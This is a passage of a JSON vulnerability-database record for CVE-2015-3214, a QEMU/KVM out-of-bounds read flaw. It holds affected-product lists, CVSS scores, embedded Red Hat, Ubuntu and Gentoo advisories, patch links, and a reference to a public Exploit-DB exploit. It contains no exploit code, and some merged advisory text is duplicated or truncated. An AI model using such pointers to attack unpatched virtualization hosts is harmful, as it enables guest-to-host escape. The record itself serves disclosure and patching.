                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_compute_node_eus:7.5:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_compute_node_eus:7.6:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_compute_node_eus:7.7:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_server_update_services_for_sap_solutions:7.2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_for_power_big_endian_eus:7.3_ppc64:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_for_power_big_endian_eus:7.4_ppc64:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_for_power_big_endian_eus:7.5_ppc64:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_for_power_big_endian_eus:7.6_ppc64:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_for_power_big_endian_eus:7.7_ppc64:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_server_from_rhui:7.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              }
            ],
            "operator": "OR"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2015-3214"
      }
    ]
  },
  "credits": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/credits#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Matt Tait of Google\u0027s Project Zero.",
    "sources": [
      {
        "db": "BID",
        "id": "75273"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201506-371"
      }
    ],
    "trust": 0.9
  },
  "cve": "CVE-2015-3214",
  "cvss": {
    "@context": {
      "cvssV2": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
      },
      "cvssV3": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
      },
      "severity": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/cvss/severity#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/severity"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "cvssV2": [
          {
            "acInsufInfo": false,
            "accessComplexity": "MEDIUM",
            "accessVector": "LOCAL",
            "authentication": "NONE",
            "author": "NVD",
            "availabilityImpact": "COMPLETE",
            "baseScore": 6.9,
            "confidentialityImpact": "COMPLETE",
            "exploitabilityScore": 3.4,
            "impactScore": 10.0,
            "integrityImpact": "COMPLETE",
            "obtainAllPrivilege": false,
            "obtainOtherPrivilege": false,
            "obtainUserPrivilege": false,
            "severity": "MEDIUM",
            "trust": 1.0,
            "userInteractionRequired": false,
            "vectorString": "AV:L/AC:M/Au:N/C:C/I:C/A:C",
            "version": "2.0"
          },
          {
            "acInsufInfo": null,
            "accessComplexity": "Medium",
            "accessVector": "Local",
            "authentication": "None",
            "author": "NVD",
            "availabilityImpact": "Complete",
            "baseScore": 6.9,
            "confidentialityImpact": "Complete",
            "exploitabilityScore": null,
            "id": "CVE-2015-3214",
            "impactScore": null,
            "integrityImpact": "Complete",
            "obtainAllPrivilege": null,
            "obtainOtherPrivilege": null,
            "obtainUserPrivilege": null,
            "severity": "Medium",
            "trust": 0.9,
            "userInteractionRequired": null,
            "vectorString": "AV:L/AC:M/Au:N/C:C/I:C/A:C",
            "version": "2.0"
          },
          {
            "accessComplexity": "MEDIUM",
            "accessVector": "LOCAL",
            "authentication": "NONE",
            "author": "VULHUB",
            "availabilityImpact": "COMPLETE",
            "baseScore": 6.9,
            "confidentialityImpact": "COMPLETE",
            "exploitabilityScore": 3.4,
            "id": "VHN-81175",
            "impactScore": 10.0,
            "integrityImpact": "COMPLETE",
            "severity": "MEDIUM",
            "trust": 0.1,
            "vectorString": "AV:L/AC:M/AU:N/C:C/I:C/A:C",
            "version": "2.0"
          }
        ],
        "cvssV3": [],
        "severity": [
          {
            "author": "NVD",
            "id": "CVE-2015-3214",
            "trust": 1.8,
            "value": "MEDIUM"
          },
          {
            "author": "CNNVD",
            "id": "CNNVD-201506-371",
            "trust": 0.6,
            "value": "MEDIUM"
          },
          {
            "author": "VULHUB",
            "id": "VHN-81175",
            "trust": 0.1,
            "value": "MEDIUM"
          },
          {
            "author": "VULMON",
            "id": "CVE-2015-3214",
            "trust": 0.1,
            "value": "MEDIUM"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-81175"
      },
      {
        "db": "VULMON",
        "id": "CVE-2015-3214"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2015-004512"
      },
      {
        "db": "NVD",
        "id": "CVE-2015-3214"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201506-371"
      }
    ]
  },
  "description": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/description#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "The pit_ioport_read in i8254.c in the Linux kernel before 2.6.33 and QEMU before 2.3.1 does not distinguish between read lengths and write lengths, which might allow guest OS users to execute arbitrary code on the host OS by triggering use of an invalid index. QEMU is prone to a memory-corruption vulnerability because it fails to perform adequate boundary-checks on user-supplied data. \nAn attacker can exploit this issue to execute arbitrary code on the host with the privileges of the hosting QEMU process. Failed exploit attempts may result in a denial-of-service condition. The Linux kernel is the kernel used by the open source operating system Linux released by the American Linux Foundation. The NFSv4 implementation is one of the distributed file system protocols. QEMU (also known as Quick Emulator) is a set of analog processor software developed by French programmer Fabrice Bellard. The software has the characteristics of fast speed and cross-platform. There is a security vulnerability in the \u0027pit_ioport_read\u0027 function in the i8254.c file of Linux kernel 2.6.32 and earlier versions and QEMU 2.3.0 and earlier versions. The vulnerability is due to the fact that the program does not distinguish between read length and write length. Relevant releases/architectures:\n\nRHEV-H and VDSM for 7 Hosts - x86_64\n\n3. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\n=====================================================================\n                   Red Hat Security Advisory\n\nSynopsis:          Important: qemu-kvm security and bug fix update\nAdvisory ID:       RHSA-2015:1507-01\nProduct:           Red Hat Enterprise Linux\nAdvisory URL:      https://rhn.redhat.com/errata/RHSA-2015-1507.html\nIssue date:        2015-07-27\nCVE Names:         CVE-2015-3214 CVE-2015-5154 \n=====================================================================\n\n1. Summary:\n\nUpdated qemu-kvm packages that fix two security issues and one bug are now\navailable for Red Hat Enterprise Linux 7. \n\nRed Hat Product Security has rated this update as having Important security\nimpact. Common Vulnerability Scoring System (CVSS) base scores, which give\ndetailed severity ratings, are available for each vulnerability from the\nCVE links in the References section. \n\n2. Relevant releases/architectures:\n\nRed Hat Enterprise Linux Client (v. 7) - x86_64\nRed Hat Enterprise Linux Client Optional (v. 7) - x86_64\nRed Hat Enterprise Linux ComputeNode Optional (v. 7) - x86_64\nRed Hat Enterprise Linux Server (v. 7) - ppc64, x86_64\nRed Hat Enterprise Linux Server Optional (v. 7) - ppc64, x86_64\nRed Hat Enterprise Linux Workstation (v. 7) - x86_64\nRed Hat Enterprise Linux Workstation Optional (v. 7) - x86_64\n\n3. Description:\n\nKVM (Kernel-based Virtual Machine) is a full virtualization solution for\nLinux on AMD64 and Intel 64 systems. The qemu-kvm package provides the\nuser-space component for running virtual machines using KVM. \n\nA heap buffer overflow flaw was found in the way QEMU\u0027s IDE subsystem\nhandled I/O buffer access while processing certain ATAPI commands. \n(CVE-2015-5154)\n\nAn out-of-bounds memory access flaw, leading to memory corruption or\npossibly an information leak, was found in QEMU\u0027s pit_ioport_read()\nfunction. (CVE-2015-3214)\n\nRed Hat would like to thank Matt Tait of Google\u0027s Project Zero security\nteam for reporting the CVE-2015-3214 issue. The CVE-2015-5154 issue was\ndiscovered by Kevin Wolf of Red Hat. \n\nThis update also fixes the following bug:\n\n* Due to an incorrect implementation of portable memory barriers, the QEMU\nemulator in some cases terminated unexpectedly when a virtual disk was\nunder heavy I/O load. This update fixes the implementation in order to\nachieve correct synchronization between QEMU\u0027s threads. As a result, the\ndescribed crash no longer occurs. (BZ#1233643)\n\nAll qemu-kvm users are advised to upgrade to these updated packages, which\ncontain backported patches to correct these issues. After installing this\nupdate, shut down all running virtual machines. Once all virtual machines\nhave shut down, start them again for this update to take effect. \n\n4. Solution:\n\nBefore applying this update, make sure all previously released errata\nrelevant to your system have been applied. \n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258\n\n5. Bugs fixed (https://bugzilla.redhat.com/):\n\n1229640 - CVE-2015-3214 qemu/kvm: i8254: out-of-bounds memory access in pit_ioport_read function\n1243563 - CVE-2015-5154 qemu: ide: atapi: heap overflow during I/O buffer memory access\n\n6. Package List:\n\nRed Hat Enterprise Linux Client (v. 7):\n\nSource:\nqemu-kvm-1.5.3-86.el7_1.5.src.rpm\n\nx86_64:\nlibcacard-1.5.3-86.el7_1.5.i686.rpm\nlibcacard-1.5.3-86.el7_1.5.x86_64.rpm\nqemu-img-1.5.3-86.el7_1.5.x86_64.rpm\nqemu-kvm-1.5.3-86.el7_1.5.x86_64.rpm\nqemu-kvm-common-1.5.3-86.el7_1.5.x86_64.rpm\nqemu-kvm-debuginfo-1.5.3-86.el7_1.5.i686.rpm\nqemu-kvm-debuginfo-1.5.3-86.el7_1.5.x86_64.rpm\nqemu-kvm-tools-1.5.3-86.el7_1.5.x86_64.rpm\n\nRed Hat Enterprise Linux Client Optional (v. 7):\n\nx86_64:\nlibcacard-devel-1.5.3-86.el7_1.5.i686.rpm\nlibcacard-devel-1.5.3-86.el7_1.5.x86_64.rpm\nlibcacard-tools-1.5.3-86.el7_1.5.x86_64.rpm\nqemu-kvm-debuginfo-1.5.3-86.el7_1.5.i686.rpm\nqemu-kvm-debuginfo-1.5.3-86.el7_1.5.x86_64.rpm\n\nRed Hat Enterprise Linux ComputeNode Optional (v. 7):\n\nSource:\nqemu-kvm-1.5.3-86.el7_1.5.src.rpm\n\nx86_64:\nlibcacard-1.5.3-86.el7_1.5.i686.rpm\nlibcacard-1.5.3-86.el7_1.5.x86_64.rpm\nlibcacard-devel-1.5.3-86.el7_1.5.i686.rpm\nlibcacard-devel-1.5.3-86.el7_1.5.x86_64.rpm\nlibcacard-tools-1.5.3-86.el7_1.5.x86_64.rpm\nqemu-img-1.5.3-86.el7_1.5.x86_64.rpm\nqemu-kvm-1.5.3-86.el7_1.5.x86_64.rpm\nqemu-kvm-common-1.5.3-86.el7_1.5.x86_64.rpm\nqemu-kvm-debuginfo-1.5.3-86.el7_1.5.i686.rpm\nqemu-kvm-debuginfo-1.5.3-86.el7_1.5.x86_64.rpm\nqemu-kvm-tools-1.5.3-86.el7_1.5.x86_64.rpm\n\nRed Hat Enterprise Linux Server (v. 7):\n\nSource:\nqemu-kvm-1.5.3-86.el7_1.5.src.rpm\n\nppc64:\nqemu-img-1.5.3-86.el7_1.5.ppc64.rpm\nqemu-kvm-debuginfo-1.5.3-86.el7_1.5.ppc64.rpm\n\nx86_64:\nlibcacard-1.5.3-86.el7_1.5.i686.rpm\nlibcacard-1.5.3-86.el7_1.5.x86_64.rpm\nqemu-img-1.5.3-86.el7_1.5.x86_64.rpm\nqemu-kvm-1.5.3-86.el7_1.5.x86_64.rpm\nqemu-kvm-common-1.5.3-86.el7_1.5.x86_64.rpm\nqemu-kvm-debuginfo-1.5.3-86.el7_1.5.i686.rpm\nqemu-kvm-debuginfo-1.5.3-86.el7_1.5.x86_64.rpm\nqemu-kvm-tools-1.5.3-86.el7_1.5.x86_64.rpm\n\nRed Hat Enterprise Linux Server Optional (v. 7):\n\nppc64:\nlibcacard-1.5.3-86.el7_1.5.ppc.rpm\nlibcacard-1.5.3-86.el7_1.5.ppc64.rpm\nlibcacard-devel-1.5.3-86.el7_1.5.ppc.rpm\nlibcacard-devel-1.5.3-86.el7_1.5.ppc64.rpm\nlibcacard-tools-1.5.3-86.el7_1.5.ppc64.rpm\nqemu-kvm-debuginfo-1.5.3-86.el7_1.5.ppc.rpm\nqemu-kvm-debuginfo-1.5.3-86.el7_1.5.ppc64.rpm\n\nx86_64:\nlibcacard-devel-1.5.3-86.el7_1.5.i686.rpm\nlibcacard-devel-1.5.3-86.el7_1.5.x86_64.rpm\nlibcacard-tools-1.5.3-86.el7_1.5.x86_64.rpm\nqemu-kvm-debuginfo-1.5.3-86.el7_1.5.i686.rpm\nqemu-kvm-debuginfo-1.5.3-86.el7_1.5.x86_64.rpm\n\nRed Hat Enterprise Linux Workstation (v. 7):\n\nSource:\nqemu-kvm-1.5.3-86.el7_1.5.src.rpm\n\nx86_64:\nlibcacard-1.5.3-86.el7_1.5.i686.rpm\nlibcacard-1.5.3-86.el7_1.5.x86_64.rpm\nqemu-img-1.5.3-86.el7_1.5.x86_64.rpm\nqemu-kvm-1.5.3-86.el7_1.5.x86_64.rpm\nqemu-kvm-common-1.5.3-86.el7_1.5.x86_64.rpm\nqemu-kvm-debuginfo-1.5.3-86.el7_1.5.i686.rpm\nqemu-kvm-debuginfo-1.5.3-86.el7_1.5.x86_64.rpm\nqemu-kvm-tools-1.5.3-86.el7_1.5.x86_64.rpm\n\nRed Hat Enterprise Linux Workstation Optional (v. 7):\n\nx86_64:\nlibcacard-devel-1.5.3-86.el7_1.5.i686.rpm\nlibcacard-devel-1.5.3-86.el7_1.5.x86_64.rpm\nlibcacard-tools-1.5.3-86.el7_1.5.x86_64.rpm\nqemu-kvm-debuginfo-1.5.3-86.el7_1.5.i686.rpm\nqemu-kvm-debuginfo-1.5.3-86.el7_1.5.x86_64.rpm\n\nThese packages are GPG signed by Red Hat for security.  Our key and\ndetails on how to verify the signature are available from\nhttps://access.redhat.com/security/team/key/\n\n7. References:\n\nhttps://access.redhat.com/security/cve/CVE-2015-3214\nhttps://access.redhat.com/security/cve/CVE-2015-5154\nhttps://access.redhat.com/security/updates/classification/#important\n\n8. Contact:\n\nThe Red Hat security contact is \u003csecalert@redhat.com\u003e. More contact\ndetails at https://access.redhat.com/security/team/contact/\n\nCopyright 2015 Red Hat, Inc. \n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1\n\niD8DBQFVtjQAXlSAg2UNWIIRAubOAJ9jPmZf7ZF+FHd+a7JxYxxRPAGx0wCgv5dX\nhlTFJ96W8Yn4W+ZR2yhsbBU=\n=i68a\n-----END PGP SIGNATURE-----\n\n\n--\nRHSA-announce mailing list\nRHSA-announce@redhat.com\nhttps://www.redhat.com/mailman/listinfo/rhsa-announce\n. ============================================================================\nUbuntu Security Notice USN-2692-1\nJuly 28, 2015\n\nqemu vulnerabilities\n============================================================================\n\nA security issue affects these releases of Ubuntu and its derivatives:\n\n- Ubuntu 15.04\n- Ubuntu 14.04 LTS\n\nSummary:\n\nSeveral security issues were fixed in QEMU. In the default installation, when QEMU is\nused with libvirt, attackers would be isolated by the libvirt AppArmor\nprofile. In the default installation, when QEMU is used with\nlibvirt, attackers would be isolated by the libvirt AppArmor profile. \n(CVE-2015-5154)\n\nZhu Donghai discovered that QEMU incorrectly handled the SCSI driver. In the default installation, when QEMU is used with libvirt,\nattackers would be isolated by the libvirt AppArmor profile. This issue\nonly affected Ubuntu 15.04. (CVE-2015-5158)\n\nUpdate instructions:\n\nThe problem can be corrected by updating your system to the following\npackage versions:\n\nUbuntu 15.04:\n  qemu-system                     1:2.2+dfsg-5expubuntu9.3\n  qemu-system-aarch64             1:2.2+dfsg-5expubuntu9.3\n  qemu-system-arm                 1:2.2+dfsg-5expubuntu9.3\n  qemu-system-mips                1:2.2+dfsg-5expubuntu9.3\n  qemu-system-misc                1:2.2+dfsg-5expubuntu9.3\n  qemu-system-ppc                 1:2.2+dfsg-5expubuntu9.3\n  qemu-system-sparc               1:2.2+dfsg-5expubuntu9.3\n  qemu-system-x86                 1:2.2+dfsg-5expubuntu9.3\n\nUbuntu 14.04 LTS:\n  qemu-system                     2.0.0+dfsg-2ubuntu1.15\n  qemu-system-aarch64             2.0.0+dfsg-2ubuntu1.15\n  qemu-system-arm                 2.0.0+dfsg-2ubuntu1.15\n  qemu-system-mips                2.0.0+dfsg-2ubuntu1.15\n  qemu-system-misc                2.0.0+dfsg-2ubuntu1.15\n  qemu-system-ppc                 2.0.0+dfsg-2ubuntu1.15\n  qemu-system-sparc               2.0.0+dfsg-2ubuntu1.15\n  qemu-system-x86                 2.0.0+dfsg-2ubuntu1.15\n\nAfter a standard system update you need to restart all QEMU virtual\nmachines to make all the necessary changes. \n\nCVE-2015-5165\n\n    Donghai Zhu discovered that the QEMU model of the RTL8139 network\n    card did not sufficiently validate inputs in the C+ mode offload\n    emulation, allowing a malicious guest to read uninitialized memory\n    from the QEMU process\u0027s heap. \n\nCVE-2015-5225\n\n    Mr Qinghao Tang from QIHU 360 Inc. \n\nFor the oldstable distribution (wheezy), these problems have been fixed\nin version 1.1.2+dfsg-6a+deb7u9. The oldstable distribution is only\naffected by CVE-2015-5165 and CVE-2015-5745. \n\nFor the stable distribution (jessie), these problems have been fixed in\nversion 1:2.1+dfsg-12+deb8u2. \n\nFor the unstable distribution (sid), these problems have been fixed in\nversion 1:2.4+dfsg-1a. \n\nWe recommend that you upgrade your qemu packages. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\nGentoo Linux Security Advisory                           GLSA 201510-02\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n                                           https://security.gentoo.org/\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n\n Severity: Normal\n    Title: QEMU: Arbitrary code execution\n     Date: October 31, 2015\n     Bugs: #551752, #555680, #556050, #556052\n       ID: 201510-02\n\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n\nSynopsis\n========\n\nA heap-based buffer overflow in QEMU could result in execution of\narbitrary code. \n\nAffected packages\n=================\n\n    -------------------------------------------------------------------\n     Package              /     Vulnerable     /            Unaffected\n    -------------------------------------------------------------------\n  1  app-emulation/qemu          \u003c 2.3.0-r4               \u003e= 2.3.0-r4\n\nDescription\n===========\n\nHeap-based buffer overflow has been found in QEMU\u0027s PCNET controller. \n\nWorkaround\n==========\n\nThere is no known workaround at this time. \n\nResolution\n==========\n\nAll QEMU users should upgrade to the latest version:\n\n  # emerge --sync\n  # emerge --ask --oneshot --verbose \"\u003e=app-emulation/qemu-2.3.0-r4\"\n\nReferences\n==========\n\n[ 1 ] CVE-2015-3209\n      http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-3209\n[ 2 ] CVE-2015-3214\n      http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-3214\n[ 3 ] CVE-2015-5154\n      http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-5154\n[ 4 ] CVE-2015-5158\n      http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-5158\n\nAvailability\n============\n\nThis GLSA and any updates to it are available for viewing at\nthe Gentoo Security Website:\n\n https://security.gentoo.org/glsa/201510-02\n\nConcerns?\n=========\n\nSecurity is a primary focus of Gentoo Linux and ensuring the\nconfidentiality and security of our users\u0027 machines is of utmost\nimportance to us. Any security concerns should be addressed to\nsecurity@gentoo.org or alternatively, you may file a bug at\nhttps://bugs.gentoo.org. \n\nLicense\n=======\n\nCopyright 2015 Gentoo Foundation, Inc; referenced text\nbelongs to its owner(s). \n\nThe contents of this document are licensed under the\nCreative Commons - Attribution / Share Alike license. \n\nhttp://creativecommons.org/licenses/by-sa/2.5\n",
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2015-3214"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2015-004512"
      },
      {
        "db": "BID",
        "id": "75273"
      },
      {
        "db": "VULHUB",
        "id": "VHN-81175"
      },
      {
        "db": "VULMON",
        "id": "CVE-2015-3214"
      },
      {
        "db": "PACKETSTORM",
        "id": "132839"
      },
      {
        "db": "PACKETSTORM",
        "id": "132859"
      },
      {
        "db": "PACKETSTORM",
        "id": "132838"
      },
      {
        "db": "PACKETSTORM",
        "id": "132855"
      },
      {
        "db": "PACKETSTORM",
        "id": "133422"
      },
      {
        "db": "PACKETSTORM",
        "id": "134165"
      }
    ],
    "trust": 2.61
  },
  "exploit_availability": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/exploit_availability#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "reference": "https://www.scap.org.cn/vuln/vhn-81175",
        "trust": 0.1,
        "type": "unknown"
      },
      {
        "reference": "https://vulmon.com/exploitdetails?qidtp=exploitdb\u0026qid=37990",
        "trust": 0.1,
        "type": "exploit"
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-81175"
      },
      {
        "db": "VULMON",
        "id": "CVE-2015-3214"
      }
    ]
  },
  "external_ids": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "db": "NVD",
        "id": "CVE-2015-3214",
        "trust": 3.5
      },
      {
        "db": "BID",
        "id": "75273",
        "trust": 2.1
      },
      {
        "db": "SECTRACK",
        "id": "1032598",
        "trust": 1.8
      },
      {
        "db": "EXPLOIT-DB",
        "id": "37990",
        "trust": 1.8
      },
      {
        "db": "OPENWALL",
        "id": "OSS-SECURITY/2015/06/25/7",
        "trust": 1.8
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2015-004512",
        "trust": 0.8
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201506-371",
        "trust": 0.7
      },
      {
        "db": "PACKETSTORM",
        "id": "133422",
        "trust": 0.2
      },
      {
        "db": "PACKETSTORM",
        "id": "132859",
        "trust": 0.2
      },
      {
        "db": "PACKETSTORM",
        "id": "132855",
        "trust": 0.2
      },
      {
        "db": "PACKETSTORM",
        "id": "132838",
        "trust": 0.2
      },
      {
        "db": "PACKETSTORM",
        "id": "132839",
        "trust": 0.2
      },
      {
        "db": "VULHUB",
        "id": "VHN-81175",
        "trust": 0.1
      },
      {
        "db": "VULMON",
        "id": "CVE-2015-3214",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "134165",
        "trust": 0.1
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-81175"
      },
      {
        "db": "VULMON",
        "id": "CVE-2015-3214"
      },
      {
        "db": "BID",
        "id": "75273"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2015-004512"
      },
      {
        "db": "PACKETSTORM",
        "id": "132839"
      },
      {
        "db": "PACKETSTORM",
        "id": "132859"
      },
      {
        "db": "PACKETSTORM",
        "id": "132838"
      },
      {
        "db": "PACKETSTORM",
        "id": "132855"
      },
      {
        "db": "PACKETSTORM",
        "id": "133422"
      },
      {
        "db": "PACKETSTORM",
        "id": "134165"
      },
      {
        "db": "NVD",
        "id": "CVE-2015-3214"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201506-371"
      }
    ]
  },
  "id": "VAR-201508-0166",
  "iot": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": true,
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-81175"
      }
    ],
    "trust": 0.01
  },
  "last_update_date": "2023-12-18T11:48:38.431000Z",
  "patch": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/patch#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "title": "KVM: PIT: control word is write-only",
        "trust": 0.8,
        "url": "https://github.com/torvalds/linux/commit/ee73f656a604d5aa9df86a97102e4e462dd79924"
      },
      {
        "title": "Linux Kernel Archives",
        "trust": 0.8,
        "url": "http://www.kernel.org"
      },
      {
        "title": "KVM: PIT: control word is write-only",
        "trust": 0.8,
        "url": "http://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=ee73f656a604d5aa9df86a97102e4e462dd79924"
      },
      {
        "title": "Main Page",
        "trust": 0.8,
        "url": "http://wiki.qemu.org/main_page"
      },
      {
        "title": "Bug 1229640",
        "trust": 0.8,
        "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1229640"
      },
      {
        "title": "Linux kernel  and QEMU\u2018pit_ioport_read()\u2019 Fixes for function buffer error vulnerabilities",
        "trust": 0.6,
        "url": "http://123.124.177.30/web/xxk/bdxqbyid.tag?id=179689"
      },
      {
        "title": "Ubuntu Security Notice: qemu vulnerabilities",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=usn-2692-1"
      },
      {
        "title": "Red Hat: CVE-2015-3214",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_cve_database\u0026qid=cve-2015-3214"
      },
      {
        "title": "Debian Security Advisories: DSA-3348-1 qemu -- security update",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=debian_security_advisories\u0026qid=e77a95c04be0a28f98566f006db46f03"
      },
      {
        "title": "Debian CVElist Bug Report Logs: qemu: CVE-2015-5225: ui: vnc: heap memory corruption in vnc_refresh_server_surface",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=debian_cvelist_bugreportlogs\u0026qid=d315b3f2df801c1586a4d3ea5f0ef1c4"
      },
      {
        "title": "Debian CVElist Bug Report Logs: qemu: CVE-2015-5158: scsi stack buffer overflow",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=debian_cvelist_bugreportlogs\u0026qid=2bc68b0a8f94995d352f509d204ba98b"
      },
      {
        "title": "Debian CVElist Bug Report Logs: qemu: CVE-2015-5166: Use after free in QEMU/Xen block unplug protocol",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=debian_cvelist_bugreportlogs\u0026qid=78f6b481a815feb050c6fe696b774caa"
      },
      {
        "title": "Debian CVElist Bug Report Logs: qemu: CVE-2015-3214: i8254: out-of-bounds memory access in pit_ioport_read function",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=debian_cvelist_bugreportlogs\u0026qid=3e5707b2974af878892901fb1518c885"
      },
      {
        "title": "Debian CVElist Bug Report Logs: qemu: CVE-2015-5745: buffer overflow in virtio-serial",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=debian_cvelist_bugreportlogs\u0026qid=b661eddefc5e1edaa146807f1a72ab9d"
      },
      {
        "title": "Debian CVElist Bug Report Logs: qemu: CVE-2015-5154: ide: atapi: heap overflow during I/O buffer memory access",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=debian_cvelist_bugreportlogs\u0026qid=ac31639f0a78082f2e78528ea7e0203f"
      },
      {
        "title": "Debian CVElist Bug Report Logs: qemu: CVE-2015-5165: rtl8139 uninitialized heap memory information leakage to guest",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=debian_cvelist_bugreportlogs\u0026qid=0e14e001f6f939c9dca39f2c06ec9285"
      },
      {
        "title": "cve_diff_checker",
        "trust": 0.1,
        "url": "https://github.com/lcatro/cve_diff_checker "
      },
      {
        "title": "CVE-Study",
        "trust": 0.1,
        "url": "https://github.com/thdusdl1219/cve-study "
      }
    ],
    "sources": [
      {
        "db": "VULMON",
        "id": "CVE-2015-3214"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2015-004512"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201506-371"
      }
    ]
  },
  "problemtype_data": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "problemtype": "CWE-119",
        "trust": 1.9
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-81175"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2015-004512"
      },
      {
        "db": "NVD",
        "id": "CVE-2015-3214"
      }
    ]
  },
  "references": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/references#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "trust": 1.9,
